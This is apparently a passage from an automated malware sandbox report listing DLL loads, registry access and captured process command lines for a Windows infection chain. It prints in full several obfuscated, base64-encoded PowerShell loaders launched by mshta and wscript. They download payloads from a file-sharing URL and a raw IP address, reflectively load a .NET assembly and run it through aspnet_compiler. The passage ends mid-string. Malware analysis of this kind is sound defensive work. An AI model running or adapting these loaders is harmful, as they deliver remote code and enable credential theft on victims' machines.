                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2085425076.0000000007052000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2088188636.0000000007F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: aspnet_compiler.pdb source: 31437F.exe.11.dr
                Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.pdb source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb